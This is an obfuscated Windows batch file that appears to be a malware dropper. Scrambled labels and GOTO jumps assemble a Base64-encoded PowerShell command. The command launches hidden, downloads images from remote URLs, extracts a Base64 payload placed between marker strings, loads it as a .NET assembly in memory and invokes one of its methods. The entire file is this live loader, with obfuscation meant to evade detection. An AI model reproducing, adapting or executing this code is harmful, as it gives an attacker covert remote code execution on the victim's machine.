@echo off
GOTO NIIOIGGDDD
:SIDGINOIOF
SET OGFSFJGGJD=ntList '-Command \"$sofigo = ''IAAgACAAWwBOAGUAdAAuAFMAZQByAHYAa
GOTO SKGNOONNGI
:OKODJIGFDJ
SET GSNDIODNSG=CQAaQBuAGoAZQBjACwAIAAnADAAJwAgACwAIAAnAHgANgA0ACd@AKQApAH0AfQA7AAoA'';$oWjuxd = [system.T
GOTO NNNFFHNJIG2
:FFFOGFIKFJ
SET ODOJGIHIFO=HAGUAdABNAGUAdABoAG8AZAAoACd@AbABmAHMAZwBlAGQAZABkAGQAZABkAGQAYQAnACkALgBJAG4AdgBvAGs
GOTO NOJGDDINHF6
:IIFGGIINDS
SET DOOGNIIFGU=B0AC0AUwBsAGUAZQBwACAAMQAgAH0AIAA+ACAAJABuAHUAbABsAAoAIAAgACAAIAAgACAAIAAgACQA
GOTO SDIJSGIFGF9
:JNNDFHNKFF
SET NGUSFFSGDF=DUANgA5ADd@AOQBlAGEANQAyAGEANAAwAGYAYQA3ADd@AZQA5ADQAYwA2ADkAZABjADIANwA0ADUAYQA0ADIAY
GOTO NOJGDDINHF9
:FIIJDKJFHH
SET IGGUKSGKDS=QBuAGd@AXQA6ADoAVQBUAEYAOAAuAEd@AZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZ
GOTO GNDDGDNNDI
:SIDGINOIOF3
SET GIFOIOOIJF=BsAGUAZABMAGkAbgBrAHMAKQAgAHsAIAB0AHIAeQAgAHsAIAByAGUAdAB1AHIAbgAgACQAdwBlAGIAQ
GOTO SIDGINOIOF4
:ONNUIDJDIJ
SET IIFFIGJDUI=AAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAKACAAIAAgACAAIAAgACAAIAAgACQAYgBhAHMAZQA2ADQAQwBv
GOTO ODFOONJIDH
:NSGGGFJOFD
SET DOIDDINFGG=CAAMQAuAC4AMgAgAHwAIABGAG8Ad@gBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAUwB0AGEAd@g
GOTO IIFGGIINDS
:DDJFDDJDJF
SET GFGGGDHONJ=CgAgACAAIAAgACAAIAAgACAAJABpAG4AagBlAGMAIAA9ACAAJwBWAGIAYwAnADsACg
GOTO NOJGDDINHF4
:JDOJFKKSGF
SET HUIKOGFSOD=LQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAd
GOTO SINGJNIGSS0
:FDFSJOHGDO
SET IIONHNHSDI=gACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAd@wB0AGUAbQAuAEMAbwB
GOTO SINGJNIGSS9
:SIDGINOIOF5
SET GIFKSJSKFO=CAAfQAgAGMAYQB0AGMAaAAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9ACAAfQA7ACAACgAgACAAI
GOTO SIDGINOIOF6
:NNNFFHNJIG
SET DDDNGHSJID=wBdAF0AJABsAGkAbgBrAHMAKQAgAAoAIAAgACAAIAAgACAAIAAgACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgB
GOTO NUNHGOOGDI
:NFKJSJNDDF
SET NNDOGNHOGG=AIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdAB
GOTO DJODNDHOHJ6
:GOGJFSDIGG
SET JFODOGHDGN=AQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACd@AOwAgACQAZQBuAGQARgBsA
GOTO DJODNDHOHJ4
:HDFISGGGNG
SET DDIJGFDGSN=AHMAIAA9ACAARABvAHd@AbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAAk
GOTO JJNIODDJIG
:FDSDGUJJFO
SET GFOUJUJGGU=MQAyADd@AMQAxADMANAAzACd@AKQApADsACgAgACAAIAAgACAAIAAgACAAIAAkAGkAbQBhAGd@AZQBCAHkAdABl
GOTO HDFISGGGNG
:IGDGJKDIGG
SET OGOGNNFFOF=bAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAd@wBzAGUAbQBiAGwAe
GOTO DINFIIGDOI
:IODGGGFDGG
SET DFGGJKGGDD=ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAgACAAJABlAG4AZABJAG4AZABlA
GOTO SDIJSGIFGF1
:GOFIIFDIFJ
SET DNDNIJNHKF=MQAzADQAMwAnACkALAAgACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAArACAAJwBuAGd@AZg
GOTO SKGNOONNGI5
:DINFIIGDOI
SET NGFGGFINID=QBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAd@wApADsACgAgACAAIAAgACAAIAAgA
GOTO NSGGGFJOFD
:DGFDFOOKDO
SET NODDFIIDIN=ApADsACgAgACAAIAAgACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAG
GOTO NDDGDGHOIJ
:NOJGDDINHF
SET GGOFJKNGDN=wAaQBuAGsAd@wAgAHsAIABwAGEAd@gBhAG0AIAAoAFsAd@wB0AHIAaQBuAGd@AW
GOTO NNNFFHNJIG
:SIDGINOIOF6
SET FIDGHIDGNG=AAgACAAIAAgACAAd@gBlAHQAdQByAG4AIAAkAG4AdQBsAGwAIAB9ADsAIAAKACAAIAAgACAAIAA
GOTO SIDGINOIOF7
:JJNIODDJIG
SET IGFGDUFDOF=AGwAaQBuAGsAd@wA7AAoAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGkAbQBhAGd@AZQ
GOTO SKGNOONNGI9
:SDIJSGIFGF
SET NNDFJKGSNN=BjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARABhAHQAYQBGAHIAbwBtAE
GOTO NOJGDDINHF
:SDIJSGIFGF4
SET GSDGUFDJGD=AIAAgACAAIAAgACAAIAAkAGwAbwBhAGQAZQBkAEEAd@wBzAGUAbQBiAGwAeQAgAD0AIAB
GOTO IGDGJKDIGG
:NOJGDDINHF1
SET HOGNIGJFFD=QAbQBlACd@AKQA7AAoAIAAgACAAIAAgACAAIAAxAC4ALgAyACAAfAAgAEYAbwByAEUAYQBjAGgALQ
GOTO NOJGDDINHF2
:SIDGINOIOF1
SET DJDFNJDFID=AG4AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAd@wAuAEwAZQBuAGd@AdABoADsAIAAKACAAIAAgAC
GOTO SIDGINOIOF2
:NOJGDDINHF7
SET NOIGJFDNFO=HgAdAAuAGQAYQBvAGwAd@AB1AGgAbwBpAG8AawB1AHIAdABpAFd@ALwAwADAANgA2AGIANQBjA
GOTO JNNDFHNKFF
:NDDGDGHOIJ
SET FJUJDFGSIF=EAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAKACAAIAA
GOTO FDFSJOHGDO
:SIDGINOIOF4
SET GIJGSJOIGD=wBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApA
GOTO SIDGINOIOF5
:NOJGDDINHF9
SET DJIIFIONHG=gA3AC8AYgBvAGwAYgAvAGsAbgBpAGwAYQBkAC8AawBpAGwAYQBkAG4AYQBrAC8AbQBvA
GOTO NNNFFHNJIG0
:JSJKGINDGN
SET OUOUIOGDJJ=UALgBjAG8ALwBzAHQAbwByAGEAZwBlAC8AdgAxAC8AbwBiAGoAZQBjAHQALw
GOTO SKGNOONNGI3
:SIDGINOIOF7
SET FUIDJUHHFD=gACAAIAAkAEIAeQB0AGUAd@wAgAD0AIAAnAGgAdAB0ACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAd
GOTO SIDGINOIOF8
:GNDDGDNNDI
SET IDFGKNHOGG=QBzACkAOwAKACAAIAAgACAAIAAgACAAIAAgACQAd@wB0AGEAd@gB0AEYAbABhAGd@AIAA9ACAAJwA8ADw
GOTO GOGJFSDIGG
:GFGNIFGFNK
SET IGGGOONIJF=CAAJABsAGkAbgBrAHMAIAA9ACAAQAAoACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAAr
GOTO GDJIUJJDOD
:NNNFFHNJIG4
%JISGJGINOU%%OGFSFJGGJD%%NDDUGSOIGF%%NOFSGIDDIS%%DDNFDIINFJ%%NNDFJKGSNN%%GGOFJKNGDN%%DDDNGHSJID%%DHGDGNIFKG%%FSGGGNSDSK%%GGJNIFGJIN%%DJDFNJDFID%%JIDNIIGSDS%%GIFOIOOIJF%%GIJGSJOIGD%%GIFKSJSKFO%%FIDGHIDGNG%%FUIDJUHHFD%%IGJOFFOGJF%%NDGDDKOGSJ%%IGGGOONIJF%%GGGHGFGDFD%%OUOUIOGDJJ%%GKDDGJNNGK%%DNDNIJNHKF%%FJODIGJFFD%%GFOUJUJGGU%%DDIJGFDGSN%%IGFGDUFDOF%%IGHIOHFJGF%%NFGOGDFFDI%%IGGUKSGKDS%%IDFGKNHOGG%%JFODOGHDGN%%SGOJHGNSIG%%NNDOGNHOGG%%GDSGFNGGON%%ODDOIINDKO%%FGFDJDDFGJ%%HUIKOGFSOD%%ODHFDIIGNI%%GJODGGOSDF%%SNKIKJDIJG%%IIFFIGJDUI%%JOOKOOOOUF%%ONGUJIJINI%%NODDFIIDIN%%FJUJDFGSIF%%IIONHNHSDI%%GKGDGSDFKO%%DFGGJKGGDD%%OGJFJFGIIN%%ISSIJGNSGO%%NSGOHGOFFJ%%GSDGUFDJGD%%OGOGNNFFOF%%NGFGGFINID%%DOIDDINFGG%%DOOGNIIFGU%%FJKFFGDNGD%%FDDIGGIOJO%%HOGNIGJFFD%%OIGDGOGIGD%%GFGGGDHONJ%%JIDIIGFDNI%%ODOJGIHIFO%%KOIDNNJIUK%%NOIGJFDNFO%%NGUSFFSGDF%%DJIIFIONHG%%ISIIISJODS%%GSNDIODNSG%%FIKFOGDKJG%%GINGOOGNNK%
GOTO NNNFFHNJIG5
:NNNFFHNJIG3
SET GINGOOGNNK=eplace^(''d@'',''c''^)^)^);iex $OWjuxD\"'"
GOTO NNNFFHNJIG4
:SFGJNDOKGF
SET ODDOIINDKO=QB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGA
GOTO GGDGIKSOJN
:NIIOIGGDDD
SET JISGJGINOU=powershell -Command "Start-Process powershell -WindowStyle Hidden -Argume
GOTO SIDGINOIOF
:NOJGDDINHF0
SET FDDIGGIOJO=AKAAnAHQAZQBzAHQAd@ABvAHd@AZQByAHMAaABlAGwAbAAuAEgAbwBhAGEAYQBhAGEAYQBzAG
GOTO NOJGDDINHF1
:GGDGIKSOJN
SET FGFDJDDFGJ=GwAYQBnACkAOwAKACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAA
GOTO JDOJFKKSGF
:NDNJOJGGDS
SET SNKIKJDIJG=2ADQATABlAG4AZwB0AGgAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AI
GOTO ONNUIDJDIJ
:NNNFFHNJIG0
SET ISIIISJODS=GMALgBiAHUAaAB0AGkAZwAvAC8AOgBzACd@ALAAgACd@AMAAnACwAIAAnACd@ALAAgA
GOTO OKODJIGFDJ
:NNNFFHNJIG5

GOTO NNNFFHNJIG6
:FGJOSDUFUG
SET ONGUJIJINI=MAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAaA
GOTO DGFDFOOKDO
:NOJGDDINHF2
SET OIGDGOGIGD=BPAGIAagBlAGMAdAAgAHsAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAxACAAfQAgAD4AIAAkAG4AdQBsAGwA
GOTO DDJFDDJDJF
:SDIJSGIFGF9
SET FJKFFGDNGD=dAB5AHAAZQAgAD0AIAAkAGwAbwBhAGQAZQBkAEEAd@wBzAGUAbQBiAGwAeQAuAEd@AZQB0AFQAeQBwAGU
GOTO NOJGDDINHF0
:NUNHGOOGDI
SET DHGDGNIFKG=lAHd@ALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQ
GOTO NIHODDHDDG
:NIHODDHDDG
SET FSGGGNSDSK=BlAG4AdAA7ACAACgAgACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACAAPQAgAEd
GOTO SIDGINOIOF0
:SIDGINOIOF8
SET IGJOFFOGJF=@wAyACAAPQAgACd@Ad@ABzADoALwAvACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAGwAZgBzAGQAZgBzAGQA
GOTO SIDGINOIOF9
:SDIJSGIFGF1
SET OGJFJFGIIN=HgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKA
GOTO SDIJSGIFGF2
:SIDGINOIOF0
SET GGJNIFGJIN=@AZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAbABp
GOTO SIDGINOIOF1
:DJODNDHOHJ
SET NOFSGIDDIS=BvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8A
GOTO SINGJNIGSS
:ODFOONJIDH
SET JOOKOOOOUF=AG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4AUwB1AGIAd@wB0AHIAaQBuAGd@AKAAkAH
GOTO FGJOSDUFUG
:GDJIUJJDOD
SET GGGHGFGDFD=ACAAJwB5AGIAZwBjAHQAZAB0AGIAegB2AGd@Ad@ABkAHgAagBpAHYAYQBmAHkALgBzAHUAd@ABhAGIAYQBzAG
GOTO JSJKGINDGN
:SKGNOONNGI
SET NDDUGSOIGF=QBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAd@g
GOTO DJODNDHOHJ
:SINGJNIGSS
SET DDNFDIINFJ=bABUAHkAd@ABlAF0AOgA6AFQAbABzADEAMgAKACAAIAAgACAAIAAgACAAIABmAHUAbg
GOTO SDIJSGIFGF
:NOJGDDINHF4
SET JIDIIGFDNI=AgACAAIAAgACAAIAAgACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgB
GOTO FFFOGFIKFJ
:DJODNDHOHJ4
SET SGOJHGNSIG=GEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHg
GOTO NFKJSJNDDF
:NOJGDDINHF6
SET KOIDNNJIUK=AZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0A
GOTO NOJGDDINHF7
:DJODNDHOHJ6
SET GDSGFNGGON=hAHIAdABGAGwAYQBnACkAOwAgAAoAIAAgACAAIAAgACAAIAAgACQAZQBuAGQASQBuAGQAZ
GOTO SFGJNDOKGF
:SKGNOONNGI5
SET FJODIGJFFD=BrAGoAZgB5AC4AaQBjAHUALwBpAG0AZwAvAGkAbQBhAGd@AZQAuAGoAd@ABnAD8A
GOTO FDSDGUJJFO
:SKGNOONNGI9
SET IGHIOHFJGF=BCAHkAdABlAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAaQBtAGEAZw
GOTO DJODNDHOHJ0
:SIDGINOIOF9
SET NDGDDKOGSJ=ZwAgAD0AIAAgACQAQgB5AHQAZQBzACAAKwAkAEIAeQB0AGUAd@wAyADsACgAgACAAIAAgACAAIAAgA
GOTO GFGNIFGFNK
:SIDGINOIOF2
SET JIDNIIGSDS=AAIAAgACAAIABmAG8Ad@gBlAGEAYwBoACAAKAAkAGwAaQBuAGsAIABpAG4AIAAkAHMAaAB1AGYAZg
GOTO SIDGINOIOF3
:NNNFFHNJIG2
SET FIKFOGDKJG=ext.encoding]::Unicode.GetString^([system.convert]::Frombase64string^($sofigo.r
GOTO NNNFFHNJIG3
:SINGJNIGSS1
SET GJODGGOSDF=dABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgAAoAIAAgACAAIAAgACAAIAAgACQAYgBhAHMAZQA
GOTO NDNJOJGGDS
:SKGNOONNGI3
SET GKDDGJNNGK=BwAHUAYgBsAGkAYwAvAG4AYQBuAG8ALwBpAG0AYQBnAGUALgBqAHAAZwA/ADEAMgA3ADEA
GOTO GOFIIFDIFJ
:DJODNDHOHJ0
SET NFGOGDFFDI=BlAFQAZQB4AHQAIAA9ACAAWwBTAHkAd@wB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAa
GOTO FIIJDKJFHH
:SINGJNIGSS9
SET GKGDGSDFKO=uAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAd@wBlADYANABTAHQAd@gBpAG4AZwAo
GOTO IODGGGFDGG
:SDIJSGIFGF3
SET NSGOHGOFFJ=APQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAKACA
GOTO SDIJSGIFGF4
:SINGJNIGSS0
SET ODHFDIIGNI=ABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMA
GOTO SINGJNIGSS1
:SDIJSGIFGF2
SET ISSIJGNSGO=AkAGUAbgBkAEYAbABhAGd@AKQA7ACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACA
GOTO SDIJSGIFGF3
:NNNFFHNJIG6